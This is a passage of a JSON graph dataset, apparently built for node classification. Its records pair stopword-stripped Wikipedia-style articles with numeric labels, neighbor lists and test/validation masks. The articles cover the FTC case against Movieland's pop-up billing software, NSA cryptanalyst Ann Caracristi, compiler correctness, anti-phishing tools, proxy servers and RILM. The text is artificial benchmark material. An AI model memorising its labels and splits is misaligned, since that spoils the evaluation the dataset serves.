injunctive relief rescission contracts restitution disgorgement equitable relief defendants deceptive unfair acts practices violation section 5 ftc act complaint alleged defendants demanding payment fix problem created installing disruptive software could removed reasonable means according ftc complaint movieland repeatedly bombarded consumers pop-up windows accompanied music lasted nearly minute demanded minimum payment 29.95 end recurring pop-up cycle claiming consumers signed three-day free trial cancel service trial period complaint charged pop-ups large dark background took much screen blocking access windows contain close minimize buttons forcing user continue first pop-up showed date time content access software installed system 3 day free trial began text click 'continue purchase license stop reminders graphic reading stop reminders click continue option offered button labeled continue clicking continue brought next pop-up 40-second audiovisual clip featuring woman introduced personal customer service representative stated cancel trial period legally obligated make payment per terms conditions agreed installed content delivery software clip neared conclusion new dialog box entitled payment options appeared choosing close window option ended pop-ups unvarying cycle began addition complaint alleged defendants made numerous false statements attempting collect payments consumers claiming computer owner someone else consented receiving pop-up payment demands paid owner computer received pop-ups legally obligated pay movieland computer owner obligated satisfy contract person entered using computer customer service telephone number provided 900 number consumers called recorded greeting told would incur 34.95 charge hang within three seconds complaint also alleged defendants made difficult impossible consumers uninstall software attempting remove windows control panel add remove programs function redirected web page telling pay 29.95 fee stop pop-ups way many consumers could regain control computers pay fee pay computer technician remove software movieland representatives said downloads spyware get computers accidentally insisting drive-by downloads said ftc lawsuit improperly brought pointed time complaint filed federal judge rejected ftc request temporary restraining order would immediately ended cited billing practices terms service movieland web site warned users cancel pay three-day period pop-up billing reminders would begin appear frequently choose one payment options pay license movieland said pop-ups anti-fraud mechanism received without consumers intentionally downloading software several intentional steps default setting cancel company also stated extrinsic programs adware otherwise bundled software company disputed ftc claim software difficult get rid said could removed using windows control panel following ten companies two individuals named defendants ftc complaint november 2006 defendants ftc signed stipulations governing pre-trial conduct without admitting wrongdoing violation law involvement acts practices alleged complaint defendants agreed make clear prominent disclosures prior software download installation download install software without user explicit consent without disclosing clearly prominently site terms service nature frequency duration pop-up windows may appear regarding purported obligation payment pop-ups also must lock access rest computer also agreed fixed limits many pop-ups generate computer maximum 5 per day 1 per hour requirement provide mute button sound content pop-ups able close windows provide hyperlink toll-free number email utility request stopping pop-ups certain conditions defendants also promised clearly label single-click download install buttons pre-select default also required represent consumers legal contractual obligation pay software unless computer owner provided personal identification agreed pay failure pay result collection proceedings affect computer owner credit status unless owner provided personal identification credit card agreed pay customer service agents may state believe computer owner responsible paying download offer several purchase options including one-time 30-day non-renewing license 29.95 access service terminate ftc complaint scheduled tried united states district court january 2008 trial defendants chose settle court ftc movieland settled ftc september 2007 without admitting wrongdoing violation law defendants agreed make permanent terms pre-trial stipulations including limiting number frequency duration billing pop-ups pay ftc 501,367 reimburse consumers paid program result repeated pop-up demands defendants also agreed stop offering anonymous free trials users certify install time least 18 years age provide install-time link terms service end user license agreement download software reinstalls user removed prominently post removal instructions web sites agreement also requires herd garroni notify ftc change name address employment status new business affiliations five years august 14 2006 rob mckenna attorney general state washington charged movieland digital enterprises herd garroni violating state computer spyware act consumer protection act complaint filed king county superior court seattle alleged misrepresentations unlawful business acts practices similar alleged ftc complaint alleged violations washington state law defendants subject fines 100,000 per violation spyware act 2,000 per violation consumer protection act found liable also subject paying restitution affected consumers alleged violations washington state law included taking control user computer violation spyware act consumer protection act cpa remotely installing billing software initiates controls pop-up cycle misrepresenting ability uninstall software violation acts listing software add/remove programs although software uninstalled unconscionable business practices violation cpa aggressive harassing billing method used failure disclose including use billing method forces payment completely obstructing users access computers threats harassment intimidation billing practices violation cpa threatening collection proceedings adverse effect users credit records fact defendants even know consumer name referring consumers legal obligation pay fact legally binding contract failure disclose material facts violation cpa aggressive relentless threatening form payment demands fact uninstallation option software disabled defendants transmit software user computer surreptitiously misrepresentations violation cpa including stating software contains spyware fact software constitutes spyware behavior announcing suit following seven-month investigation washington attorney general rob mckenna rejected one possible defense defendants claim users legally obligated pay service lacks merit consumers provide knowing consent installation relentless pop-up demands said furthermore computer owners responsible satisfy contracts people including minors entered using computer also said defendants threats collection proceedings adverse effects users credit ratings empty defendants way personally identify computer users assistant attorney general paula selis said tactics forced consumers give pay 20 100 service said sued getting complaints consumers felt harassed held barrel payments n't agree make selis said harassment intimidation consumer using high-pressure tactic make pay something legally obligated pay movieland settled washington april 2007 terms similar ftc settlement specific washington consumers agreeing pay washington 50,000 consumer reimbursement prominently state important contract terms including cost subscription service advertisements",
    "neighbors": [
      3555,
      4718,
      2611,
      10392,
      3163,
      1629
    ],
    "mask": "Test"
  },
  {
    "node_id": 4719,
    "label": 4,
    "text": "Ann_Z._Caracristi:ann z. caracristi ann zeilinger caracristi february 1 1921 – january 10 2016 american cryptanalyst former deputy director national security agency served various positions 40-year career served member secretary defense joint security commission president foreign intelligence advisory board became first woman nsa promoted gs-18 rank 1975 became chief research operations born bronxville new york attended russell sage college women ’ college troy new york graduated 1942 english history major graduation recruited army signal intelligence service work code breaker recommendation dean russell sage caracristi sent washington d.c. attended cryptanalysis courses william friedman puzzles used train cryptographers art pattern recognition world war ii caracristi cryptography work focused deciphering additive systems used japanese military forces merchant fleet known exceptional talent reconstructing enemy code books colleagues among first americans learn japan planned surrender deciphered code august 14 1945 following war caracristi hired agency would later become part national security agency promoted first supergrade higher civil service paygrade 1959 gs-18 highest supergrade chief research operations 1975 1980 caracristi became sixth nsa deputy director first woman serve role received department defense distinguished civilian service award 1980 highest award given civilians deputy director credited providing leadership new generations code breakers integrating use computers technology retired 1982 continued serve panels intelligence community including president clinton ’ foreign intelligence advisory board appointed 1993 2003 caracristi given honorary degree national intelligence university academic award name given high-performing graduate student year lived adult life one-bedroom cottage georgetown hobbies included birds collecting pewter 2002 name given naval intelligence professionals award caracristi died january 10 2016 washington age 94 dementia later years 1980 received department defense distinguished civilian service award one subjects 2017 non-fiction book code girls untold story american women code breakers world war ii liza mundy",
    "neighbors": [
      266,
      6668,
      9357,
      2580,
      1941,
      2712,
      289,
      4898,
      11302,
      4007,
      1714,
      10305,
      327,
      6343,
      7887,
      10832,
      2897,
      4566,
      6749,
      7137,
      365
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4720,
    "label": 9,
    "text": "Compiler_correctness:compiler correctness computing compiler correctness branch computer science deals trying show compiler behaves according language specification techniques include developing compiler using formal methods using rigorous testing often called compiler validation existing compiler compiler validation formal methods involves long chain formal deductive logic however since tool find proof theorem prover implemented software complex high probability contain errors one approach use tool verifies proof proof checker much simpler proof-finder less likely contain errors complete example approach compcert formally verified optimizing compiler large subset c99 methods include model checking formal verification provably correct semantics-directed compiler generation testing represents significant portion effort shipping compiler receives comparatively little coverage standard literature 1986 edition single-page section compiler testing named examples 2006 edition omits section testing emphasize importance “ optimizing compilers difficult get right dare say optimizing compiler completely error-free thus important objective writing compiler correct. ” fraser hanson 1995 brief section regression testing source code available bailey davidson 2003 cover testing procedure calls number articles confirm many released compilers significant code-correctness bugs sheridan 2007 probably recent journal article general compiler testing commercial compiler compliance validation suites available solid sands perennial plum-hall purposes largest body information available compiler testing fortran cobol validation suites common techniques testing compilers fuzzing generates random programs try find bugs compiler test case reduction tries minimize found test case make easier understand",
    "neighbors": [
      1952,
      8262,
      2262
    ],
    "mask": "None"
  },
  {
    "node_id": 4721,
    "label": 6,
    "text": "Install_(Unix):install unix install command unix program used copy files set file permissions implementations offer invoke strip installing executable files",
    "neighbors": [
      2432,
      811,
      5492,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 4722,
    "label": 4,
    "text": "Anti-phishing_software:anti-phishing software anti-phishing software consists computer programs attempt identify phishing content contained websites e-mail forms used accessing data usually internet block content usually warning user often option view content regardless often integrated web browsers email clients toolbar displays real domain name website viewer visiting attempt prevent fraudulent websites masquerading legitimate websites popular web browsers comes built-in anti-phishing anti-malware protection services almost none alternate web browsers protections password managers also used help defend phishing mutual authentication techniques study conducted 3sharp company helps businesses manage demo content released september 27 2006 tested ability eight anti-phishing solutions block known phishing sites warn phishing sites allow legitimate sites study commissioned microsoft titled gone phishing evaluating anti-phishing tools windows concluded internet explorer netcraft toolbar effective anti-phishing tools later independent study conducted carnegie mellon university cylab titled phinding phish evaluation anti-phishing toolbars released november 13 2006 tested ability ten anti-phishing solutions block warn known phishing sites block warn legitimate sites exhibit false-positives well usability solution solutions tested netcraft toolbar earthlink scamblocker spoofguard able correctly identify 75 sites tested netcraft toolbar receiving highest score without incorrectly identifying legitimate sites phishing severe problems however discovered using spoofguard incorrectly identified 38 tested legitimate sites phishing leading conclusion inaccuracies might nullify benefits spoofguard offers identifying phishing sites google safe browsing since built firefox internet explorer performed well testing ability detect fresh phishes netcraft toolbar scored high 96 google safe browsing scored low 0 possibly due technical problems google safe browsing testing performed using phishing data obtained anti-phishing working group phishtank unnamed email filtering vendor latest study conducted smartware mozilla released november 14 2006 concluded anti-phishing filter firefox effective internet explorer 10 results study questioned critics noting testing data sourced exclusively phishtank anti-phishing provider study compared internet explorer firefox leaving among others netcraft toolbar opera browser use data phishtank anti-phishing solutions led speculations limited testing data opera netcraft toolbar would gotten perfect score part study two directly aforementioned reports released one day apart asa dotzler director community development mozilla responded criticism mozilla-commissioned report saying 're agreeing recent legitimate data puts firefox ahead good enough since studies conducted microsoft opera software started licensing netcraft anti-phishing data bringing effectiveness browser built-in anti-phishing par netcraft toolbar beyond",
    "neighbors": [
      2049,
      3971,
      8584,
      6028,
      11418,
      1052,
      9757,
      6431,
      7713,
      422,
      6699,
      6064,
      10928,
      5178,
      704,
      5078,
      5082,
      4326,
      488,
      9712,
      10872,
      9983
    ],
    "mask": "None"
  },
  {
    "node_id": 4723,
    "label": 5,
    "text": "Common_Open_Policy_Service:common open policy service common open policy service cops protocol part internet protocol suite defined ietf rfc 2748 cops specifies simple client/server model supporting policy control quality service qos signaling protocols e.g rsvp policies stored servers acted upon policy decision points pdp enforced clients also known policy enforcement points pep two models cops outsourcing model provisioning model considered view client pep outsourcing model simplest cops implementation model policies stored pdp whenever pep needs make decision sends relevant information pdp pdp analyzes information makes decision relays pep pep simply enforces decision provisioning model see rfc 3084 cops usage policy provisioning cops-pr pep reports decision-making capabilities pdp pdp downloads relevant policies pep pep make decisions based policies provisioning model uses policy information base repository policies",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      11210,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      119,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4724,
    "label": 6,
    "text": "Hybrid_disc:hybrid disc hybrid disc disc cd-rom blu-ray disc contains multiple types data used differently different devices include cd-rom music albums containing video files viewable personal computer feature film blu-ray discs containing interactive content used playstation 3 game console hybrid disc optical disc multiple file systems installed typically iso 9660 hfs+ hfs older discs one reason hybrid format restrictions iso 9660 filenames eight characters maximum depths eight directories similar microsoft fat file system another key factor iso 9660 support resource forks critical classic mac os software design os x macos removed much need resource forks application design companies released products dos later windows classic mac os later macos could release cd containing software natively readable either system data files even shared partitions keeping platform specific data separate true shared hybrid hfs filesystem files common iso 9660 hfs partitions stored iso 9660 partition pointing file content hfs area vice versa blizzard entertainment released computer games hybrid cds default mac os 9 macos burn hybrid discs iso 9660/hfs hybrid disc iso 9660 primary volume descriptor makes valid iso 9660 disc apple partition may also apple partition map although necessary iso 9660 portion disc co-exist apple partition header areas define contents disc located different places iso 9660 primary volume descriptor begins 32,768 bytes 32 kb disc present apple partition map begins 512 bytes disc partition map header apple hfs partition known master directory block mdb begins 1,024 bytes disc hybrid-cd also refers audio cd also includes data track storing mp3 digital audio compression format copy cd-da tracks introduction subsequent popularization itunes ipod discs popular sharing music compact disc without requiring recipient extract encode cd-da — technical perhaps time-consuming process older computing hardware however advent faster computing hardware vastly simplified automated extraction encoding tools e.g itunes rhythmbox etc lack automated hybrid feature software popularity hybrid cd subsequently declined however hybrid discs remain commercial setting digital rights management enforcement technique encrypted compressed copies digital audio provided proprietary software listening computer disc drive cd-da included playback stand-alone cd players recent years blu-ray discs released hybrid discs demonstrating compatibility playstation 3 console uses bd primary disc format discs generally include movie feature played blu-ray disc player playable content accessible run playstation 3 console examples include macross frontier itsuwari utahime",
    "neighbors": [
      576,
      9762,
      5413,
      2149,
      8937,
      2156,
      6797,
      8114,
      11410,
      3167
    ],
    "mask": "None"
  },
  {
    "node_id": 4725,
    "label": 4,
    "text": "Proxy_server:proxy server computer networks proxy server server computer system application acts intermediary requests clients seeking resources servers client connects proxy server requesting service file connection web page resource available different server proxy server evaluates request way simplify control complexity proxies invented add structure encapsulation distributed systems proxy server may reside user local computer point user computer destination servers internet open proxy forwarding proxy server accessible internet user 2008 gordon lyon estimates hundreds thousands open proxies internet anonymous open proxy allows users conceal ip address browsing web using internet services varying degrees anonymity however well number methods 'tricking client revealing regardless proxy used reverse proxy surrogate proxy server appears clients ordinary server reverse proxies forward requests one ordinary servers handle request response proxy server returned came directly original server leaving client knowledge original server reverse proxies installed neighborhood one web servers traffic coming internet destination one neighborhood web servers goes proxy server use reverse originates counterpart forward proxy since reverse proxy sits closer web server serves restricted set websites several reasons installing reverse proxy servers content-filtering web proxy server provides administrative control content may relayed one directions proxy commonly used commercial non-commercial organizations especially schools ensure internet usage conforms acceptable use policy content filtering proxy often support user authentication control web access also usually produces logs either give detailed information urls accessed specific users monitor bandwidth usage statistics may also communicate daemon-based and/or icap-based antivirus software provide security virus malware scanning incoming content real time enters network many workplaces schools colleges restrict web sites online services accessible available buildings governments also censor undesirable content done either specialized proxy called content filter commercial free products available using cache-extension protocol icap allows plug-in extensions open caching architecture websites commonly used students circumvent filters access blocked content often include proxy user access websites filter trying block requests may filtered several methods url dns blacklists blacklist url regex filtering mime filtering content keyword filtering products known employ content analysis techniques look traits commonly used certain types content providers blacklists often provided maintained web-filtering companies often grouped categories pornography gambling shopping social networks etc. assuming requested url acceptable content fetched proxy point dynamic filter may applied return path example jpeg files could blocked based fleshtone matches language filters could dynamically detect unwanted language content rejected http fetch error may returned requester web filtering companies use internet-wide crawling robot assesses likelihood content certain type resultant database corrected manual labor based complaints known flaws content-matching algorithms proxies scan outbound content e.g. data loss prevention scan content malicious software web filtering proxies able peer inside secure sockets http transactions assuming chain-of-trust ssl/tls transport layer security tampered ssl/tls chain-of-trust relies trusted root certificate authorities workplace setting client managed organization trust might granted root certificate whose private key known proxy consequently root certificate generated proxy installed browser ca list staff situations proxy analysis contents ssl/tls transaction becomes possible proxy effectively operating man-in-the-middle attack allowed client trust root certificate proxy owns destination server filters content based origin request use proxy circumvent filter example server using ip-based geolocation restrict service certain country accessed using proxy located country access service web proxies common means bypassing government censorship although 3 internet users use circumvention tools cases users circumvent proxies filter using blacklists using services designed proxy information non-blacklisted location proxies installed order eavesdrop upon data-flow client machines web content sent accessed – including passwords submitted cookies used – captured analyzed proxy operator reason passwords online services webmail banking always exchanged cryptographically secured connection ssl chaining proxies reveal data original requester possible obfuscate activities eyes user destination however traces left intermediate hops could used offered trace user activities policies administrators proxies unknown user may fall victim false sense security details sight mind inconvenience risk proxy users may find blocked certain web sites numerous forums web sites block ip addresses proxies known spammed trolled site proxy bouncing used maintain privacy caching proxy server accelerates service requests retrieving content saved previous request made client even clients caching proxies keep local copies frequently requested resources allowing large organizations significantly reduce upstream bandwidth usage costs significantly increasing performance isps large businesses caching proxy caching proxies first kind proxy server web proxies commonly used cache web pages web server poorly implemented caching proxies cause problems inability use user authentication proxy designed mitigate specific link related issues degradation performance enhancing proxy peps typically used improve tcp performance presence high round-trip times high packet loss wireless mobile phone networks highly asymmetric links featuring different upload download rates peps make efficient use network example merging tcp acks acknowledgements compressing data sent application layer translation proxy proxy server used localize website experience different markets traffic global audience routed translation proxy source website visitors browse proxied site requests go back source site pages rendered original language content response replaced translated content passes back proxy translations used translation proxy either machine translation human translation combination machine human translation different translation proxy implementations different capabilities allow customization source site local audience excluding source content substituting source content original local content proxy used automatically repair errors proxied content instance bikiniproxy system instruments javascript code fly order detect automatically repair errors happening browser.. another kind repair done proxy fix accessibility issues anonymous proxy server sometimes called web proxy generally attempts anonymize web surfing different varieties anonymizers destination server server ultimately satisfies web request receives requests anonymizing proxy server thus receive information end user address requests anonymous anonymizing proxy server however degree trust present proxy server user many proxy servers funded continued advertising link user access control proxy servers implement logon requirement large organizations authorized users must log gain access web organization thereby track usage individuals anonymizing proxy servers may forward data packets header lines http_via http_x_forwarded_for http_forwarded may reveal ip address client anonymizing proxy servers known elite high-anonymity proxies make appear proxy server client website could still suspect proxy used client sends packets include cookie previous visit use high-anonymity proxy server clearing cookies possibly cache would solve problem advertisers use proxy servers validating checking quality assurance geotargeted ads geotargeting ad server checks request source ip address uses geo-ip database determine geographic source requests using proxy server physically located inside specific country city gives advertisers ability test geotargeted ads proxy keep internal network structure company secret using network address translation help security internal network makes requests machines users local network anonymous proxies also combined firewalls incorrectly configured proxy provide access network otherwise isolated internet proxies allow web sites make web requests externally hosted resources e.g images music files etc cross-domain restrictions prohibit web site linking directly outside domains proxies also allow browser make web requests externally hosted content behalf website cross-domain restrictions place protect websites likes data theft prohibit browser directly accessing outside domains secondary market brokers use web proxy servers buy large stocks limited products limited sneakers tickets web proxies forward http requests request client regular http request except full url passed instead path request sent proxy server proxy makes request specified returns response web proxies allow http connect method set forwarding arbitrary data connection common policy forward port 443 allow https traffic examples web proxy servers include apache mod_proxy traffic server haproxy iis configured proxy e.g. application request routing nginx privoxy squid varnish reverse proxy wingate ziproxy tinyproxy rabbit4 polipo clients problem complex multiple proxy-servers solved client-serer proxy auto-config protocol pac file socks also forwards arbitrary data connection phase similar http connect web proxies also known intercepting proxy inline proxy forced proxy transparent proxy intercepts normal communication without requiring special client configuration clients need aware existence proxy transparent proxy normally located client internet proxy performing functions gateway router 'transparent proxy proxy modify request response beyond required proxy authentication identification 'non-transparent proxy proxy modifies request response order provide added service user agent group annotation services media type transformation protocol reduction anonymity filtering tcp intercept traffic filtering security feature protects tcp servers tcp syn flood attacks type denial-of-service attack tcp intercept available ip traffic 2009 security flaw way transparent proxies operate published robert auger computer emergency response team issued advisory listing dozens affected transparent intercepting proxy servers intercepting proxies commonly used businesses enforce acceptable use policy ease administrative overheads since client browser configuration required second reason however mitigated features active directory group policy dhcp automatic proxy detection intercepting proxies also commonly used isps countries save upstream bandwidth improve customer response times caching common countries bandwidth limited e.g island nations must paid diversion interception tcp connection creates several issues firstly original destination ip port must somehow communicated proxy always possible e.g. gateway proxy reside different hosts class cross site attacks depend certain behaviour intercepting proxies check access information original intercepted destination problem may resolved using integrated packet-level application level appliance software able communicate information packet handler proxy intercepting also creates problems http authentication especially connection-oriented authentication ntlm client browser believes talking server rather proxy cause problems intercepting proxy requires authentication user connects site also requires authentication finally intercepting connections cause problems http caches requests responses become uncacheable shared cache integrated firewall proxy servers router/firewall host proxy communicating original destination information done method example microsoft tmg wingate interception also performed using cisco wccp web cache control protocol proprietary protocol resides router configured cache allowing cache determine ports traffic sent via transparent redirection router redirection occur one two ways gre tunneling osi layer 3 mac rewrites osi layer 2 traffic reaches proxy machine interception commonly performed nat network address translation setups invisible client browser leave proxy visible web server devices internet side proxy recent linux bsd releases provide tproxy transparent proxy performs ip-level osi layer 3 transparent interception spoofing outbound traffic hiding proxy ip address network devices several methods often used detect presence intercepting proxy server cgi web proxy accepts target urls using web form user browser window processes request returns results user browser consequently used device network allow true proxy settings changed first recorded cgi proxy named rover time renamed 1998 cgiproxy developed american computer scientist james marshall early 1996 article unix review rich morin majority cgi proxies powered one cgiproxy written perl language glype written php language phproxy written php language april 2016 cgiproxy received 2 million downloads glype received almost million downloads whilst phproxy still receives hundreds downloads per week despite waning popularity due vpns privacy methods still several thousand cgi proxies online cgi proxies set purposes making websites accessible disabled people since shut due excessive traffic usually caused third party advertising service means bypass local filtering since many users n't care collateral damage causing became necessary organizations hide proxies disclosing urls take trouble contact organization demonstrate genuine need suffix proxy allows user access web content appending name proxy server url requested content e.g en.wikipedia.org. suffixproxy.com suffix proxy servers easier use regular proxy servers offer high levels anonymity primary use bypassing web filters however rarely used due advanced web filters tor short onion router system intended enable online anonymity tor client software routes internet traffic worldwide volunteer network servers order conceal user location usage someone conducting network surveillance traffic analysis using tor makes difficult trace internet activity including visits web sites online posts instant messages communication forms back user intended protect users personal freedom privacy ability conduct confidential business keeping internet activities monitored onion routing refers layered nature encryption service original data encrypted re-encrypted multiple times sent successive tor relays one decrypts layer encryption passing data next relay ultimately destination reduces possibility original data unscrambled understood transit tor client free software additional charges use network i2p anonymous network 'i2p proxy network aiming online anonymity implements garlic routing enhancement tor onion routing i2p fully distributed works encrypting communications various layers relaying network routers run volunteers various locations keeping source information hidden i2p offers censorship resistance goals i2p protect users personal freedom privacy ability conduct confidential business user i2p runs i2p router computer node i2p router takes care finding peers building anonymizing tunnels i2p provides proxies protocols http irc socks ... software free open-source network free charge use 'proxy refers layer-7 application osi reference model network address translation nat similar proxy operates layer-3 client configuration layer-3 nat configuring gateway sufficient however client configuration layer-7 proxy destination packets client generates must always proxy server layer-7 proxy server reads packet finds true destination nat operates layer-3 less resource-intensive layer-7 proxy also less flexible compare two technologies might encounter terminology known 'transparent firewall transparent firewall means proxy uses layer-7 proxy advantages without knowledge client client presumes gateway nat layer-3 idea inside packet method layer-3 packets sent layer-7 proxy investigation dns proxy server takes dns queries usually local network forwards internet domain name server may also cache dns records client programs socks-ify allows adaptation networked software connect external networks via certain types proxy servers mostly socks",
    "neighbors": [
      4104,
      5135,
      7695,
      9233,
      3604,
      535,
      7710,
      8224,
      3625,
      9771,
      7729,
      2098,
      8753,
      5178,
      3643,
      1597,
      64,
      10816,
      2118,
      5199,
      2139,
      3676,
      5724,
      94,
      2661,
      4198,
      6757,
      3688,
      1642,
      9325,
      112,
      624,
      1653,
      4213,
      119,
      5749,
      8316,
      3198,
      4224,
      10368,
      5250,
      5251,
      4229,
      5254,
      8329,
      11408,
      149,
      150,
      1692,
      2205,
      3744,
      3237,
      10924,
      7857,
      5811,
      1208,
      4797,
      3777,
      7873,
      10433,
      3781,
      1223,
      8391,
      11469,
      5327,
      10450,
      6364,
      5860,
      3813,
      3310,
      11502,
      245,
      2299,
      4863,
      5887,
      9987,
      7430,
      7943,
      265,
      3858,
      8978,
      10518,
      10522,
      5405,
      7965,
      4895,
      7967,
      2339,
      8998,
      5433,
      4414,
      11073,
      2884,
      3908,
      2887,
      10058,
      6992,
      2387,
      4439,
      3930,
      7515,
      6493,
      5472,
      865,
      8032,
      11104,
      3428,
      3941,
      4453,
      7012,
      9580,
      10611,
      1908,
      8054,
      7031,
      9591,
      10105,
      7546,
      10622,
      2944,
      2945,
      4485,
      6534,
      4487,
      8582,
      8585,
      4490,
      5516,
      7564,
      7567,
      9616,
      3473,
      1942,
      4504,
      3482,
      7578,
      1436,
      3996,
      9117,
      5536,
      6576,
      1970,
      2994,
      2996,
      2485,
      6579,
      8630,
      1468,
      444,
      11198,
      3520,
      8644,
      10696,
      461,
      5071,
      11221,
      1495,
      2007,
      5591,
      5085,
      7652,
      5608,
      7656,
      9193,
      1520,
      1009,
      4081,
      11249,
      4085,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4726,
    "label": 1,
    "text": "Répertoire_International_de_Littérature_Musicale:répertoire international de littérature musicale répertoire international de littérature musicale international repertory music literature internationales repertorium der musikliteratur commonly known acronym rilm nonprofit organization offers digital collections advanced tools locating research topics related music mission “ make knowledge accessible research performance communities worldwide….to include music scholarship countries languages across disciplinary cultural boundaries thereby fostering research arts humanities sciences social sciences. ” central rilm ’ work mission international bibliography scholarship relating facets music research rilm founded 1966 american musicologist barry s. brook 1918–1997 joint sponsorship international musicological society ims international association music libraries archives documentation centres iaml 2007 international council traditional music ictm joined third sponsoring organization 1967 1968 rilm developed first set computer programs automated processing sorting bibliographic records author/subject indexes ran first mainframe ibm computer ibm system/360 computing center city university new york s/360 delivered ibm 1964 time advanced computing machine original ibm s/360 software later migrated ibm system/370 used production rilm abstracts twenty years 1969 1988 rilm ’ development procedures computerized data processing immediately adopted répertoire international de littérature ’ art rila founded upon rilm ’ model started publishing abstracts 1975 1979 rilm entered agreement lockheed research laboratory palo alto division lockheed missiles space company inc. distribution data telephone lines later agreement transferred dialog information retrieval services although available online already advent internet end twentieth century primary medium distribution bibliographic records printed volumes 1993 onward rilm longer available dialog information retrieval service 1989 national information service corporation nisc baltimore released rilm abstracts music literature cd-rom 1990s rilm abstracts became available online nisc muse 1993–2010 oclc first search 1994–2010 ovid/silverplatter 2002–2010 cambridge scientific abstracts/proquest 2002–2010 platforms rilm databases currently exclusively available ebsco information services rilm ’ first editorial office located queens college city university new york 1967–68 graduate center cuny provided institutional context rilm ’ international center since 1968 rilm staff 40 employees editors technology experts administrators governed guided board directors advisory committee commission mixte international consists appointed members international musicological society ims international association music libraries archives documentation centres iaml international council traditional music ictm barry brook ’ second report published march 1968 issue notes details deliberations commission mixte worked establish procedures functioning rilm rilm abstracts music literature rilm abstracts music literature covers significant international scholarship printed digital media language published since august 1967 consists citations articles single-author books collections essays bibliographies catalogues master ’ theses doctoral dissertations festschriften films videos technical drawings instruments facsimile editions iconographies commentaries included critical editions music ethnographic recordings conference proceedings reviews web resources well 3500 periodicals dovetail coverage répertoire international de la presse musicale differs music periodical indexes coverage books abstracts indexing broad international yet selective coverage entry provides title original language english translation title full bibliographic data abstract detailed index help convey “ aboutness ” record amplified online relevance-based order display individual record many non-english entries also include abstract language publication following unesco model rilm abstracts conceived cooperative national committees responsible contributing bibliographic citations abstracts publications issued respective countries international office new york today committees contribute 15,000 records annually edited indexed added online database another 35,000 records per year produced editors international office bibliographic information abstracts—as well journals yet covered rilm—can also submitted directly international center new york rilm abstracts music literature first abstracted bibliography humanities designated american council learned societies acls pilot project development computerized bibliographical system humanities serve model 30 constituent scholarly societies acls time rilm abstracts published print subject thesaurus name equivalencies led users preferred terms translated seventeen languages alphabetically integrated subject index practice allowed users find desired english-language term spelling personal name initiating search language familiar gradually rilm abstracts expanded multilingual environment database includes besides standard english-language abstracts also abstracts language publication languages whenever available mid-2000s rilm abstracts began expand coverage asian publications music scholarship published chinese periodicals concurrently elements bibliographic records publications issued non-roman writing systems offered bilingual rilm abstracts music literature appeared 1967 1983 triannual printed volumes indexes corresponding annual volumes well cumulative indexes corresponding five-year periods 1984 1999 annual volumes corresponding indexes since 2000 available exclusively online ebsco host rilm abstracts music literature full text july 2016 rilm abstracts music literature expanded addition music periodicals full-text rilm abstracts music literature full text raft offers access 240 music periodicals 50 countries coverage also includes reviews well obituaries editorials correspondence advertisements news published early twentieth century present addition metadata abstracts indexing raft offers searching browsing tools full-text issue cover cover database updated monthly details title ’ current coverage found title list rilm.org/fulltext new titles added time rilm music encyclopedias december 2015 rilm launched rilm music encyclopedias rme 41 titles librarian laurie sampsel asserts “ cross searching full text many titles yields results impossible highly unlikely find using print versions encyclopaedias. ” stephen henry mentions rme ’ “ ability provide access excellent european resources might otherwise available libraries less comprehensive collections. ” rme ’ titles stem different periods countries earliest jean jacques rousseau ’ dictionnaire de musique published 1775 also first edition “ grove ” edition published theodore presser 1895 largest amount titles date 2000 onward among ken bloom ’ broadway lol henderson lee stacey ’ encyclopedia music 20 century peter matzke et al. das gothic- und dark wave-lexikon richard kostelanetz ’ dictionary avant-gardes comprehensive conceived 1972 bis 2006 also included rme holds important titles ethnomusicologists among garland encyclopedia world music eileen southern ’ biographical dictionary afro-american african musicians first single comprehensive volume kind collection expands annually additions four titles average one titles regularly updated new articles additions existing articles titles listed rilm music encyclopedias index printed music 1 july 2018 rilm assumed ownership ipm previously owned james adrian music company founded 2000 george r. hill index printed music ipm digital finding aid searching specific musical works contained printed collections sets series indexes individual pieces music printed complete works composers anthologies containing pieces disparate historical periods scholarly editions provides granular level detail piece including performing forces language multiple clefs figured bass ipm includes complete contents collected editions historical series sets monuments music bibliography george r. hill norris l. stephens berkeley fallen leaf press 1997 turn based upon anna h. heyer ’ historical sets collected editions monuments music guide contents american library association 1957–1980 since 2019 ipm offers new features among biographical facts identifying composers editors lyricists hyperlinks open-access editions music incipits works otherwise difficult distinguish easy toggling collections individual works contained therein expanded search filters enable refined searching place date publication document type genre language text bibliolore rilm hosts blog bibliolore whose posts direct relationships content found rilm abstracts music literature enhancement rilm abstracts music literature full text well rilm music encyclopedias mgg online index printed music new posts appear every week many celebrate round birthdays musical figures anniversaries since inception 2009 bibliolore published 1300 posts viewed 500,000 times 1967 1999 rilm published rilm abstracts music literature print first quarterly later annually 1999 volume last print volume largest 19,619 records since 1972 rilm also published print volumes rilm retrospectives series topical bibliographies commenced first edition barry s. brook ’ thematic catalogues music annotated bibliography stuyvesant ny pendragon press 1972 recent volumes published series include speaking music music conferences 1835–1966 2004 annotated bibliography 5948 papers musical topics presented 447 conferences building previous efforts volume stays true brook ’ original vision expanding upon well covers 130 years conference proceedings worldwide scope though western europe remains focus subsequent volume liber amicorum festschriften music scholars nonmusicians 1840–1966 annotated bibliography catalogue 574 festschriften totaling 118 pages 715 entries next part volume totaling 355 pages 3881 entries documents articles pertaining music found listed festschriften preceded introductory history festschriften volumes principally devoted research materials published rilm issued first volume 1967 rilm perspectives series conference proceedings explores topics related organization ’ global mission inaugural volume music ’ intellectual history founders followers fads 2009 based papers presented conference history music historiography held graduate center cuny 16–19 march 2005 rilm issued two editions comprehensive style guide write music rilm manual style second edition introduces material included 2005 publication well revisions based suggestions readers manual differs significantly generalized style guides mla apa explicating matters gender-neutral language dead language punctuation serial comma em dash lens music manual specifically suited students rilm developed stand-alone platform advanced search browse capabilities host distribute music reference works beginning authoritative german-language music encyclopedia die musik geschichte und gegenwart mgg platform facilitates automatic translation 